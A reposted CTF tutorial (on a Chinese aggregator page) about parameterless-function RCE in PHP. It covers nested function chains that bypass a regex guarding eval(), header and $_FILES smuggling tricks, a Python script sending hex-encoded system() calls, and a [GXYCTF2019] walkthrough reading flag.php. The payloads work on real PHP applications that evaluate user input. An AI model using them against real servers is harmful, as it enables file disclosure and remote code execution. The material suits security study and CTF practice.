IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 无参数函数RCE -> 正文阅读

[网络协议]无参数函数RCE

目录

题目特征:

基础函数学习

方法一:array_rand()

array_filp()

方法二:getallheaders()

方法三:get_defined_vars()

例题:

[GXYCTF2019]禁止套娃 无参数RCE


粗略两种方法:
1.利用超全局变量进行bypass,进行RCE
2.进行任意文件读取

题目特征:

遇到如下限制

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

我们会发现我们使用参数则无法通过正则的校验

/[^\W]+\((?R)?\)/

而该正则,正是我们说的无参数函数的校验,其只允许执行如下格式函数

a(b(c()));

a();

但不允许 携带参数!

这样我们只能使用无参数RCE,难度徒增!

基础函数学习

  • localeconv() 函数返回一包含本地数字及货币格式信息的数组。
  • scandir() 列出 images 目录中的文件和目录。
  • readfile()? 输出一个文件。
  • current() 返回数组中的当前单元, 默认取第一个值。
  • pos() current() 的别名。
  • next() 函数将内部指针指向数组中的下一个元素,并输出。
  • array_reverse()以相反的元素顺序返回数组。
  • highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。
  • current(localeconv())?? 永远都是个点
  • localeconv()??? 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
  • current()???? 返回数组中的当前单元, 默认取第一个值。
  • pos()????? 是current()的别名。
  • var_dump()是判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。

〇、非常规操作
https://blog.csdn.net/kali_Ma/article/details/122544274


目录操作:
getchwd() :函数返回当前工作目录。
scandir() :函数返回指定目录中的文件和目录的数组。
dirname() :函数返回路径中的目录部分。
chdir() :函数改变当前的目录。


数组相关的操作:
end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。
array_shift() - 删除数组中第一个元素,并返回被删除元素的值。


读文件:
show_source() - 对文件进行语法高亮显示。
readfile() - 输出一个文件。
highlight_file() - 对文件进行语法高亮显示。
file_get_contents() - 把整个文件读入一个字符串中。
readgzfile() - 可用于读取非 gzip 格式的文件

print_r(det_defined_vars());? 打印所有可用的变量
scandir()


文件读取查看当前目录文件名
print_r(scandir(current(localeconv())));


当前目录倒数第一位文件:
show_source(end(scandir(getcwd())));

当前目录倒数第二位文件:
show_source(next(array_reverse(scandir(getcwd()))));


随机返回当前目录文件:
highlight_file(array_rand(array_flip(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(current(localeconv())))));


查看上一级目录文件名
print_r( );
print_r(scandir(next(scandir(getcwd()))));
print_r(scandir(next(scandir(getcwd()))));


读取上级目录文件
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));

payload解释:
● array_flip():交换数组中的键和值,成功时返回交换后的数组,如果失败返回 NULL。
● array_rand():从数组中随机取出一个或多个单元,如果只取出一个(默认为1),array_rand() 返回随机单元的键名。 否则就返回包含随机键名的数组。 完成后,就可以根据随机的键获取数组的随机值。
● array_flip()和array_rand()配合使用可随机返回当前目录下的文件名
● dirname(chdir(dirname()))配合切换文件路径查看和读取根目录文件


所获得的字符串第一位有几率是/,需要多试几次
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

方法一:array_rand()

效果如下

?不想要下标,我想要数组的值,那么我们可以使用

array_filp()

两者结合使用,即可出现数组的

方法二:getallheaders()

之前我们获取的是所有环境变量的列表,但其实我们并不需要这么多信息。仅仅http header即可
在apache2环境下,我们有函数getallheaders()可返回
我们可以看一下返回值

1
2
3
4
5
6
7
8
9
array(8) { 
    ["Host"]=> string(14) "106.14.114.127" 
    ["Connection"]=> string(10) "keep-alive" 
    ["Cache-Control"]=> string(9) "max-age=0" 
    ["Upgrade-Insecure-Requests"]=> string(1) "1" 
    ["User-Agent"]=> string(120) "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
    ["Accept"]=> string(118) "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
     ["Accept-Encoding"]=> string(13) "gzip, deflate" ["Accept-Language"]=> string(14) "zh-CN,zh;q=0.9" 
}

我们可以看到,成功返回了http header,我们可以在header中做一些自定义的手段,例如

?我们再将结果中的恶意命令取出

var_dump(end(getallheaders()));

?这样一来相当于我们将http header中的sky变成了我们的参数,可用其进行bypass 无参数函数执行
例如

那么可以进一步利用http header的sky属性进行rce

方法三:get_defined_vars()

使用 getallheaders ( ) 其实具有局限性,因为他是 apache 的函数,如果目标中间件不为 apache,那么这种方法就会失效,我们也没有更加普遍的方式呢?

这里我们可以使用 get_defined_vars ( ) ,首先看一下它的回显。

发现其可以回显全局变量有如下几种:

$_GET? $_POST ?? $_FILES ?? $_COOKIE

我们这里的选择也就具有多样性,可以利用 $_GET 进行 RCE,例如:

还是和之前的思路一样,将恶意参数取出。

发现可以成功 RCE。

但一般网站喜欢对如下超全局变量做全局过滤:

$_GET $_POST $_COOKIE

所以我们可以尝试从 $_FILES 下手,这就需要我们自己写一个上传:

可以发现空格会被替换成下划线 _ ,为防止干扰我们用 hex 编码进行 RCE。

最终脚本如下:

import requests from io 
import BytesIO 

payload = "system('ls /tmp');".encode('hex') 
files = { payload: BytesIO ( ’ sky cool! ’ ) } 

r = requests.post ('http://localhost/skyskysky.php?code=eval ( hex2bin ( array_rand ( end ( get_defined_vars() ))));',files=files, allow_redirects=False ) 

print r.content


//?code=eval(hex2bin(array_rand(end(get_defined_vars()))));',files=files, allow_redirects=False

例题:

[GXYCTF2019]禁止套娃 无参数RCE

分析源码:

  1. GET方式传入exp参数,若满足条件,则将exp内容当做php代码来执行。
  2. 过滤了data/filter/php/phar伪协议,不能以伪协议直接读取文件。
  3. (?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
  4. 正则匹配还过滤了et/na/info等关键字,导致get等很多函数用不了
  5. eval($_GET[‘exp’]); 典型的无参数RCE
    ?

一、首先需要得到当前目录下的文件
scandir()函数可以扫描当前目录下的文件,例如:

<?php
print_r(scandir('.'));
?>

但是要如何构造scandir('.'),这里有个‘.’直接传入就相当于还是传入一个参数,exp还是被过滤掉了,所以我们要想个其他的方法代替'.'

这里涉及到一个知识点:
current(localeconv())永远都是个点
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值。
pos()是current()的别名。
pos(localeconv())和current(localeconv())的结果一样,都是表示'.'
所以这两个函数嵌套使用就是一个'.'

那么我们第一步就解决了:

print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));


接下来就是如和读取到倒数第二个数组呢?

array_flip():交换数组中的键和值。


此时将键和值做了一下交换,下一步就是如何取出他的键。

array_rand():从数组中随机取出一个或多个单元

最后一个问题,如何读取flag.php的源码。
由于et被过滤掉了,所以不能使用file_get_contents(),但是可以市容readfile()或highlight_file()以及其别名函数show_source()。
有了以上的函数,我们就可以将这些函数组合起来读取flag了。

?exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));
?exp=highlight_file(array_rand(array_flip(scandir(pos(localeconv())))));


由于是使用array_rand()函数随机取出键值,所以可能需要多刷新几次才能取出flag.php。

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-07-21 21:50:39  更:2022-07-21 21:51:12 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 20:45:25-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计